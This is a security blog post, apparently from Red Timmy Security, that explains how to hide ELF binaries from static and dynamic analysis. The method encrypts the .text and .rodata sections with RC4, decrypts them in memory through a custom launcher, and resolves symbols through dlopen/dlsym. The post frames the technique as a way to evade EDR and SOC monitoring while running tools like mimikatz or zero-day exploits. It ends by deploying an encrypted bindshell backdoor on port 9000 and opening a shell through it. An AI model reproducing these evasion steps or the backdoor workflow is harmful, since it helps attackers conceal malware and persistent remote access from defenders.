Imagine finding yourself in a “hostile” environment, one where you can’t run exploits,
tools and applications without worrying about prying eyes spying on you, be they a
legitimate system administrator, a colleague sharing an access with you or a software
solution that scans the machine you are logged in to for malicious files. Your binary
should live in encrypted form in the filesystem so that no static analysis would be
possible even if identified and copied somewhere else. It should be only decrypted on
the fly in memory when executed, so preventing dynamic analysis too, unless the
decryption key is known.
HOW TO IMPLEMENT THAT?
On paper everything looks fine, but practically how do we implement this? With Red
Timmy Security we have created the “golden frieza” project, a collection of several
techniques to support on-the-fly encryption/decryption of binaries. Even though we are
not ready yet to release the full project, we are going to discuss in depth one of the
methods it implements, accompanied by some supporting source code.
Why is the discussion relevant both to security analysts working at SOC departments,
Threat Intelligence and Red Teams? Think about a typical Red Team operation, in which
tools that commonly trigger security alerts to SOC, such as “procmon” or “mimikatz”, are
uploaded in a compromised machine and then launched without having the installed
endpoint protection solutions or the EDR agents complaining about that.
Alternatively, think about a zero-day privilege escalation exploit that an attacker wants
to run locally in a just hacked system, but they don’t want it to be reverse engineered
while stored in the filesystem and consequently divulged to the rest of the world. This is
exactly the kind of techniques we are going to talk about. A short premise before to get started. All the examples and code released (github link)
work with ELF binaries. Conceptually there is nothing preventing you from implementing
the same techniques with Windows PE binaries, of course with the opportune
adjustments.
WHAT TO ENCRYPT?
An ELF binary file is composed of multiple sections. We are mostly interested to encrypt
the “.text” section where are located the instructions that the CPU executes when the
interpreter maps the binary in memory and transfers the execution control over it. To put
it simple, the section “.text” contains the logic of our application that we do not want to
be reverse-engineered.
WHICH CRYPTO ALGORITHM TO USE?
To encrypt the “.text” section we will avoid block ciphers, which would force the binary
instructions into that section to be aligned to the block size. A stream cipher algorithm
fits perfectly in this case, because the length of the ciphertext produced in output will be
equal to the plaintext, hence there are not padding or alignment requirements to satisfy.
We choose RC4 as encryption algorithm. The discussion of its security is beyond the
scope of this blog post. You might implement whatever else you like in replacement.
THE IMPLEMENTATION
The technique to-be implemented must be as easy as possible. We want to avoid
manual memory mappings and symbol relocations. For example, our solution could rely
on two components:
An ELF file compiled as a dynamic library exporting one or more functions
containing the encrypted instructions to be protected from prying eyes;
the launcher, a program that takes as an input the ELF dynamic library, decrypting
it in memory by means of a crypto key and then executing it.
What is not clear yet is what we should encrypt: the full “.text” section or just the
malicious functions exported in the ELF module? Let’s try to put in practice an
experiment. The following source code exports a function called “testalo()” taking no
parameter. After compilation we want it to be decrypted only once it is loaded in memory.
We compile the code as a dynamic library:
$ gcc testalo_mod.c -o testalo_mod.so -shared -fPIC
Now let’s have a look at its sections with “readelf”:
The “.text” section in the present case starts at file offset 0x580 (1408 bytes from the
beginning of testalo_mod.so) and its size is 0x100 (256 bytes). What if we fill up this
space with zeros and then try to programmatically load the library? Will it be mapped in
our process memory or the interpreter will have something to complain about? As the
encryption procedure creates garbage binary instructions, filling up the “.text” section
of our module with zeros actually simulates that without trying your hand at encrypting
the binary. We can do that by executing the command:
$ dd if=/dev/zero of=testalo_mod.so seek=1408 bs=1 count=256 conv=notrunc
…and then verifying with “xxd” that the “.text” section has been indeed entirely zeroed:
$ xxd testalo_mod.so
[...]
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]
00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]
To spot the final behavior that we are attemping to observe, we need an application (see
code snippet of “dlopen_test.c” below) that tries to map the “testalo_mod.so” module
into its address space (line 12) and then, in case of success, checks if at runtime the
function “testalo()” gets resolved (line 18) and executed (line 23).
$ gcc dlopen_test -o dlopen_test -ldl
$ ./dlopen_test
Segmentation fault (core dumped)
What we are observing here is that during the execution of line 12 the program crashes.
Why? This happens because, even if the call to “dlopen()” in our application is not
explicitly invoking anything from “testalo_mod.so”, there are functions into
“testalo_mod.so” itself that are instead automatically called (such as “frame_dummy()”)
during the module initialization process. A “gdb” session will help here.
$ objdump -M intel -d testalo_mod.so
Because such functions are all zeroed, this produces a segmentation fault when the
execution flow is transferred over those. What if we only encrypted the content of the
“testalo()” function on which our logic resides? To do that we just recompile
“testalo_mod.so” and determine the size of the function’s code with the command
“objdump -M intel -d testalo_mod.so”, by observing where the function starts and
where it ends:
The formula to calculate our value is 0x680 – 0x65a = 0x26 = 38 bytes.
Finally we overwrite the library “testalo_mod.so” with 38 bytes of zeros, starting from
where the “testalo()” function locates, which this time is offset 0x65a = 1626 bytes from
the beginning of the file:
$ dd if=/dev/zero of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc
Then we can launch “dlopen_test” again:
$ ./dlopen_test
Segmentation fault (core dumped)
Previously we have got stuck at line 12 in “dlopen_test.c”, during the initialization of
the “testalo_mod.so” dynamic library. Now instead we get stuck at line 23, when
“testalo_mod.so” has been properly mapped in our process memory, the “testalo()”
symbol has been already resolved from it (line 18) and the function is finally invoked
(line 23), which in turn causes the crash. Of course, the binary instructions are invalid
because before we have zeroed that block of memory. However if we really had put
encrypted instructions there and decrypted all before the invocation of
“testalo()”
, everything would have worked smoothly.
So, we know now what to encrypt and how to encrypt it: only the exported functions
holding our malicious payload or application logic, not the whole text section.
NEXT STEP: A FIRST PROTOTYPE FOR THE PROJECT
Let’s see a practical example of how to decrypt in memory our encrypted payload. We
said at the beginning that two components are needed in our implementation:
(a) an ELF file compiled as a dynamic library exporting one or more functions
containing the encrypted instructions to be protected from prying eyes;
(b) the launcher, a program that takes as an input the ELF dynamic library,
decrypting it in memory by means of a crypto key and then executing it.
Regarding the point (a) we will continue to utilize “testalo_mod.so” for now by encrypting
the “testalo()” function’s content only. Instead of using a specific program for that, just
take profit of existing tools such as “dd” and “openssl”:
<!-- wp:paragraph -->
<p>$ dd if=./testalo_mod.so of=./text_section.txt skip=1626 bs=1 count=38</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -<br> out text_section.enc -nopad</p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>$ dd if=./text_section.enc of=testalo_mod.so seek=1626 bs=1 count=38 <br> conv=notrunc</p>
<!-- /wp:paragraph -->
The first command basically extracts 38 bytes composing the binary instructions of
“testalo()”. The second command encrypt these with the RC4 key “AAAAAAAAAAAAAAAA”
(hex representation -> “41414141414141414141414141414141”) and the third command
write back the encrypted content to the place where “testalo()” is located into the
binary. If we observe the code of that function now with the command “objdump -M intel
-d ./testalo_mod.so”, it will be unintelligible indeed:
The second needed component is the launcher (b). Let’s analyze its C code piece by
piece. First it acquires in hexadecimal format the offset where our encrypted function is
mapped (information that we retrieve with “readelf”) and its length in byte (line 102).
Then the terminal echo is disabled (lines 116-125) in order to permit the user to type in
safely the crypto key (line 128) and finally the terminal is restored back to the original
state (lines 131-135).
Now we have the offset where our encrypted function is in memory but we do not know
yet the full memory address where it is mapped. This is determined by looking at
“/proc/PID/maps” as in the code snippet down.
Then all the pieces are settled to extract from the memory the encrypted binary
instructions (line 199), decrypt everything with the RC4 key collected previously and
write the output back to the location where “testalo()” function’s content lives (line
213). However, we could not do that without before marking that page of memory to be
writable (lines 206-210) and then back again readable/executable only (lines 218-222)
after the decrypted payload is written into it. This is because in order to protect the
executable code against tampering at runtime, the interpreter loads it into a not writable
memory region. After usage, the crypto key is also wiped out from memory (line 214).
Now the address of the decrypted “testalo()” function can be resolved (line 228) and
the binary instructions it contains be executed (line 234).
This first version of the launcher’s source code is downloadable from here. Let’s compile
it…
$ gcc golden_frieza_launcher_v1.c -o golden_frieza_launcher_v1 -ldl
…execute it, and see how it works (in bold the user input):
$ ./golden_frieza_launcher_v1 ./testalo_mod.so
Enter offset and len in hex (0xXX): 0x65a 0x26
Offset is 1626 bytes
Len is 38 bytes
Enter key: <-- key is inserted here but not echoed back
PID is: 28527
Module name is: testalo_mod.so
7feb51c56000-7feb51c57000 r-xp 00000000 fd:01 7602195 /tmp/testalo_mod.so
Start address is: 0x7feb51c56000
End address is 0x7feb51c57000
Execution of .text
Sucalo Sucalo oh oh!
oh oh Sucalo Sucalo!!
As shown at the end of the command output, the in-memory decrypted content of the
“testalo()” function is indeed successfully executed.
BUT…
What is the problem with this approach? It is that even though our library would be
stripped, the symbols of the functions invoked by “testalo()” (such as “puts()” and
“exit()”) that need to be resolved and relocated at runtime, remain well visible. In case
the binary finishes in the hands of a system administrator or SOC analyst, even with the
“.text” section encrypted in the filesystem, through simple static analysis tools such as
“objdump” and “readelf” they could inference what is the purpose of our malicious
binary.
Let’s see it with a more concrete example. Instead of using a dummy library, we decide
to implement a bindshell (see the code here) and compile that code as an ELF module:
$ gcc testalo_bindshell.c –o testalo_bindshell.so –shared -fPIC
We strip the binary with the “strip” command and encrypt the relevant “.text” portion
as already explained before. If now we look at symbols table (“readelf –s
testalo_bindshell.so”) or relocations table (“readelf –r testalo_bindshell.so”)
something very similar to the picture below appears:
This clearly reveals the usage of API such as “bind()”, “listen()”, “accept()”, “execl()”,
etc… which are all functions that typically a bindshell implementation imports. This is
inconvenient in our case because reveals the nature of our code. We need to get a
workaround.
DLOPEN AND DLSYMS
To get around the problem, the approach we adopt is to resolve external symbols at
runtime through “dlopen()” and “dlsyms()”.
For example, normally a snippet of code involving a call to “socket()” would look like
this:
#include
[...]
if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)
[...]
When the binary is compiled and linked, the piece of code above is responsible for the
creation of an entry about “socket()” in the dynamic symbols and relocations tables. As
already said, we want to avoid such a condition. Therefore the piece of code above must
be changed as follows:
Here “dlopen()” is invoked only once and “dlsyms()” is called for any external functions
that must be resolved. In practice:
“int (*_socket)(int, int, int);” -> we define a function pointer variable
having the same prototype as the original “socket()” function.
“handle = dlopen (NULL, RTLD_LAZY);” -> “if the first parameter is NULL the
returned handle is for the main program”, as stated in the linux man page.
“_socket = dlsym(handle, “socket”);” -> the variable “_socket” will contain the
address of the “socket()” function resolved at runtime with “dlsym()”.
“(*_socket)(PF_INET, SOCK_STREAM, 0)” -> we use it as an equivalent form of
“socket(PF_INET, SOCK_STREAM, 0)”. Basically the value pointed to by the
variable “_socket” is the address of the “socket()” function that has been
resolved with “dlsym()”.
These modifications must be repeated for all the external functions “bind()”, “listen()”,
“accept()”, “execl()”, etc…
You can see the differences between the two coding styles by comparing
the UNMODIFIED BINDSHELL LIBRARY and the MODIFIED ONE. After that the new
library is compiled:
$ gcc testalo_bindshell_mod.c -shared -o testalo_bindshell_mod.so -fPIC
…the main effects tied to the change of coding style are the following:
In practice the only external symbols that remain visible now are “dlopen()” and
“dlsyms()”. No usage of any other socket API or functions can be inferenced.
IS THIS ENOUGH?
This approach has some issues too. To understand that, let’s have a look at the readonly data section in the ELF dynamic library:
What’s going on? In practice, all the strings we have declared in our bindshell module
are finished in clear-text inside the “.rodata” section (starting at offset 0xaf5 and ending
at offset 0xbb5) which contains all the constant values declared in the C program! Why
is this happening? It depends on the way how we pass string parameters to the external
functions:
_socket = dlsym(handle, "socket");
What we can do to get around the issue is to encrypt the “.rodata” section as well, and
decrypt it on-the-fly in memory when needed, as we have already done with the binary
instructions in the “.text” section. The new version of the launcher component
(golden_frieza_launcher_v2) can be downloaded here and compiled with “gcc
golden_frieza_launcher_v2.c -o golden_frieza_launcher_v2 -ldl”. Let’s see how
it works. First the “.text” section of our bindshell module is encrypted:
$ dd if=./testalo_bindshell_mod.so of=./text_section.txt skip=1738 bs=1
count=1055
$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -
out text_section.enc –nopad
$ dd if=./text_section.enc of=./testalo_bindshell_mod.so seek=1738 bs=1
count=1055 conv=notrunc
Same thing for the “.rodata” section:
$ dd if=./testalo_bindshell_mod.so of=./rodata_section.txt skip=2805 bs=1
count=193
$ openssl rc4 -e -K 41414141414141414141414141414141 -in rodata_section.txt
-out rodata_section.enc -nopad
$ dd if=./rodata_section.enc of=./testalo_bindshell_mod.so seek=2805 bs=1
count=193 conv=notrunc
Then the launcher is executed. It takes the bindshell module filename (now both with
encrypted “.text” and “.rodata” sections) as a parameter:
$ ./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so
The “.text” section offset and length is passed as hex values (we have already seen
how to get those):
Enter .text offset and len in hex (0xXX): 0x6ca 0x41f
Offset is 1738 bytes
Len is 1055 bytes
Next the “.rodata” section offset and length is passed too as hex values. As seen in the
last “readelf” screenshot above, in this case the section starts at 0xaf5 and the len is
calculated like this: 0xbb5 – 0xaf5 + 1 = 0xc1:
Enter .rodata offset and len in hex (0xXX): 0xaf5 0xc1
.rodata offset is 2805 bytes
.rodata len is 193 bytes
Then the launcher asks for a command line parameter. Indeed our bindshell module
(specifically the exported “testalo()” function) takes as an input parameter the TCP
port it has to listen to. We choose 9000 for this example:
Enter cmdline: 9000
Cmdline is: 9000
The encryption key (“AAAAAAAAAAAAAAAA”) is now inserted without being echoed back:
Enter key:
The final part of the output is:
PID is: 3915
Module name is: testalo_bindshell_mod.so
7f5d0942f000-7f5d09430000 r-xp 00000000 fd:01 7602214
/tmp/testalo_bindshell_mod.so
Start address is: 0x7f5d0942f000
End address is 0x7f5d09430000
Execution of .text
==================
This time below the “Execution of .text” message we get nothing. This is due to the
behavior of our bindshell that does not print anything to the standard output. However,
the bindshell backdoor has been launched properly in the background:
$ netstat -an | grep 9000
tcp 0 0 0.0.0.0:9000 0.0.0.0:* LISTEN
$ telnet localhost 9000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=1000(cippalippa) gid=1000(cippalippa_group)
Source: